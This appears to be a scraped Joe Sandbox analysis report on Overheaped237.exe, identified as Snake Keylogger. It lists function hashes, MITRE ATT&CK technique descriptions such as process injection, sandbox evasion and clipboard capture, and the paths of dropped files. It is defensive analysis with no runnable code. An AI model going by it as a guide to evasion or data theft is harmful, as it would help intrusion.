API String ID: 0-1667412543
Opcode ID: 52566facd32eba03b97dcfd2b2ce28dd213bf7399da868823e457f5948467e2f
Instruction ID: 74ce2acd6b0903a497090dd418965b961450e6a4156fcc86d1687d7c821d018f
Opcode Fuzzy Hash: 52566facd32eba03b97dcfd2b2ce28dd213bf7399da868823e457f5948467e2f
Instruction Fuzzy Hash: 8C616074E20A06CFCB24CF69C4889ADBBB2BF89600B598169D506EB365D735EC81CF51

Function 0327AEF3 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

(oq, xrefs: 0327B079
3, xrefs: 0327AED8

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$3
API String ID: 0-3017390212
Opcode ID: b98a934abecc19113c80f7510c93428ee0765db8b3b0c0df9d1fd8c5c9d3f376
Instruction ID: 9bf02d5f7c1bd13f7dbebf9ad1d3b16b70525e5a8a9083fac7ca7f6962c44bd2
Opcode Fuzzy Hash: b98a934abecc19113c80f7510c93428ee0765db8b3b0c0df9d1fd8c5c9d3f376
Instruction Fuzzy Hash: 84413A76B242008FD704DB69D8586AE77F6FFCC221F18457AE51ADB3D0CA328C428791

Function 032741A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef20bd3c62d633cc7f8b9d69b00ba7371965a9fd0716d2cb3ccfc2ded6f0e78
Instruction ID: 49276f0977e418b6f0d37471f1f766ae65cc9816af65543897fbcd1e593bdebd
Opcode Fuzzy Hash: 4ef20bd3c62d633cc7f8b9d69b00ba7371965a9fd0716d2cb3ccfc2ded6f0e78
Instruction Fuzzy Hash: 58518F75E11308CFCB48DFAAD58499DBBF2BF89304B209069E805AB324DB35AD42CF50

Function 03275658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b868925093372b045f3c62bec73e60d332e63d25ce1d7e910af2f05930ab7f
Instruction ID: 9a20c29f2c06221c7fc4867980ef81664978b370a5c8bc7651efaa00548b679e
Opcode Fuzzy Hash: f7b868925093372b045f3c62bec73e60d332e63d25ce1d7e910af2f05930ab7f
Instruction Fuzzy Hash: 7A31D37521420ADFCF01DFA8D888AAF7BB6FB49201F144024F945AB240DB79DDA1DBA0

Function 032762F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b9eeb4c5d87f6ff651d730c76c3ebf619e462b97f5b33369ba7c9011df9a32
Instruction ID: 0486789f9ede8b84ba50939b88574c39bccced7a7f6aeac74efea32e614ac1c0
Opcode Fuzzy Hash: 53b9eeb4c5d87f6ff651d730c76c3ebf619e462b97f5b33369ba7c9011df9a32
Instruction Fuzzy Hash: EF21F535315A128FC715DB29C49862EB7A2FFC9B513088069E406DB794CF35DC42CB90

Function 032728F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411da147ea8bf421e156c8b2ca180596f8cee0935c44aced54a4d51cd61ae461
Instruction ID: b8189e4a8e3c1b31e923a72c1d509a146cd349287dde076d5c0a7b93d565c689
Opcode Fuzzy Hash: 411da147ea8bf421e156c8b2ca180596f8cee0935c44aced54a4d51cd61ae461
Instruction Fuzzy Hash: 9221A935A10315DFCB14DB68C440ABE7BE5EB9D360B69C559D8099B344DA32EE82CBD0

Function 03275649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55807ddb19bbd085477abcf3d3cf4ce768612b9b62bde89f920eba18772f6dd
Instruction ID: 5b7a0c1985b851e42b866c90404c9e1ebbda9e321e24df2d87e1332f483f951f
Opcode Fuzzy Hash: e55807ddb19bbd085477abcf3d3cf4ce768612b9b62bde89f920eba18772f6dd
Instruction Fuzzy Hash: 822138756192099FCB00DF68D488BAB7BA2FB4A314F144068F4459F340DB78CE95CBA0

Function 03276300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f95a2032b1827d52c845b863b82750eb781148f9cfc4cb6cc96e6bf23c4ab082
Instruction ID: 358e93ceb9304e7360efbafeff4425c89f16fba2d84a56f30ac29ac9f4ccdcaf
Opcode Fuzzy Hash: f95a2032b1827d52c845b863b82750eb781148f9cfc4cb6cc96e6bf23c4ab082
Instruction Fuzzy Hash: 5011A139315A129FC7199A2EC498A3EB7A6FFC9B613084478E906DB750DF35DC42CB90

Function 032727F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f5d60bba3149d36dc79447c0da0e346d9ef6c5d0cfdc9c4a0b3d225b4d9c1d
Instruction ID: db5b80ced8802a35cc65c03d9e377337b20d81e906e4a5fca5a6ceb6fd19ed00
Opcode Fuzzy Hash: 49f5d60bba3149d36dc79447c0da0e346d9ef6c5d0cfdc9c4a0b3d225b4d9c1d
Instruction Fuzzy Hash: 3121BF74C142098FCB44EFA9D8486EEBBF4FF09200F10556AD849B3210EB345A85CBA1

Function 03275E3A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d5e6e4dedfac86c037daf8f822445b3813a8e5e6c2e33776ce67d7cefbfa0e
Instruction ID: b37e094cbf8bb710600ea981df3e531c93cac7c402041730a5bee31d46d18f77
Opcode Fuzzy Hash: e2d5e6e4dedfac86c037daf8f822445b3813a8e5e6c2e33776ce67d7cefbfa0e
Instruction Fuzzy Hash: 4F014C363243445FCB06CE94E4106AD3F67EFCB140F18405AF582DB291CE758D9A8394

Function 03275EA3 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79166c294aad9565cb46d3814f941e3211c280af5b475fc64984ae8078c59af
Instruction ID: f257efaffc3efe3a66e8b0a25397f628f8235b1fe2650bc0201fcbfdc230544a
Opcode Fuzzy Hash: e79166c294aad9565cb46d3814f941e3211c280af5b475fc64984ae8078c59af
Instruction Fuzzy Hash: 25F0F632610109AFCB11CE99E804ADF7FAAEBC9350F288025F515D7240DA75CA569BD4

Function 032728A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201330cf79bafeb6867bdbf1d6a04b30e3c2e9d87aaf4f446fcfb08b5ca13307
Instruction ID: 1ceeace91354e26a33c9bb2c604c7e1041072adbe69297e6d292638fa0e78ea6
Opcode Fuzzy Hash: 201330cf79bafeb6867bdbf1d6a04b30e3c2e9d87aaf4f446fcfb08b5ca13307
Instruction Fuzzy Hash: 6BE02636E243268AC701E7A4DC000EFFB34AD95312B55CA5BC02532085EB312219C7B1

Function 032728B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456464a045770a90cb0b6ee71d461424d96852bf5b0b7ec418716c07581de446
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 456464a045770a90cb0b6ee71d461424d96852bf5b0b7ec418716c07581de446
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 0327AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ac25777a824f8fbad43b751c98e30501a3d6c8f7deb67344baf05feb4088ef
Instruction ID: b87edd85009da79e8f339f15a558829683ea8367462130ac6057e08f89736943
Opcode Fuzzy Hash: 31ac25777a824f8fbad43b751c98e30501a3d6c8f7deb67344baf05feb4088ef
Instruction Fuzzy Hash: ABD0677AB000089FCB049F98E8449DDF776FB98221B448117F915A3264C6319965DB64

Function 03276743 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735cd3cf7a52e4e282c49a45a2e3bcd89e30422c3d1742c81d6374d18245ee5c
Instruction ID: 9ac7de299c0cc5c057da7d6ea321a6d68d4b95e92b400ac14a610378d963b5f1
Opcode Fuzzy Hash: 735cd3cf7a52e4e282c49a45a2e3bcd89e30422c3d1742c81d6374d18245ee5c
Instruction Fuzzy Hash: 69D0223E8143218FD610F774E8849883753EBC00053009E20E08A1D64CDF7AAC8B4710

Function 03276748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73793d01c7798d3d2290f56a878a443281e95ca0d2dbc25aa504ffd70e79300
Instruction ID: e21bf899d55ecfc57228265665b268eb893b69675191ef24df4fdc9732d68316
Opcode Fuzzy Hash: f73793d01c7798d3d2290f56a878a443281e95ca0d2dbc25aa504ffd70e79300
Instruction Fuzzy Hash: 3DC022394103284FC110F760DC04A04331AABC00047008920A0860D50CEFBD6C4A0680

Non-executed Functions

Function 03276FC8 Relevance: 6.7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

Strings

(oq, xrefs: 03277212
(oq, xrefs: 0327753D
,q, xrefs: 03277298
,q, xrefs: 0327728A
(oq, xrefs: 03277220

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q
API String ID: 0-189141485
Opcode ID: 95fdf52aec540a51c3ab3e1d6d860543a54aa550c947f43b12c446cf6665299a
Instruction ID: 9a4b234fac922d1c713a439a26fea14cefa7a1de66245fd0b1fe0317629eaf18
Opcode Fuzzy Hash: 95fdf52aec540a51c3ab3e1d6d860543a54aa550c947f43b12c446cf6665299a
Instruction Fuzzy Hash: 3C125C31A10219DFCB14CFACC884ABDBBB6FF88344F198069E855AB261D774ED81CB50

Function 03272A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xq, xrefs: 03272BA4
Xq, xrefs: 03272AD8
Xq, xrefs: 03272B57
Xq, xrefs: 03272A9E

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 2951574ed791304f4a7d67c77d364836a8458f5184a24bb80422d88107a6aafd
Instruction ID: 888011bf2109a47e985b1259f8416b2a97bc259ed6ca26bc876fd7a5b50cfbaf
Opcode Fuzzy Hash: 2951574ed791304f4a7d67c77d364836a8458f5184a24bb80422d88107a6aafd
Instruction Fuzzy Hash: 6D315631D1031ACBDF74DFA588853AEB7B6BB84210F1854A5C419A7340DB70C9C5DB92

Function 03276920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 0327692C
\;q, xrefs: 03276936
\;q, xrefs: 03276952
\;q, xrefs: 0327695E

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 075b9c0ada8ab377fc2413de62a0039f6a0bf6bce10c5026745ab7b5da7e6326
Instruction ID: 3ef5d1e56c66ba84eb0f71ec08d1ab82b18455bf225a669dc7984e4e129a5d58
Opcode Fuzzy Hash: 075b9c0ada8ab377fc2413de62a0039f6a0bf6bce10c5026745ab7b5da7e6326
Instruction Fuzzy Hash: F4018431720A16CFC724CA2DC440B26F7E6BFC866471D41A9E806DB370DA71EC818750

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Overheaped237.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zk3ndpk.wko.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chngmwww.uap.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhrbshz.avo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbbiia4v.n2a.ps1

C:\Users\user\AppData\Local\Temp\nsc1A3D.tmp

C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Udfring53.lev

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ungallantness.kok

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Uplejedes.Ile

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Yaply50.txt

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\rancheria.pro

Windows Analysis Report
Overheaped237.exe

Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 004051BA Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B75 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00405E85 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre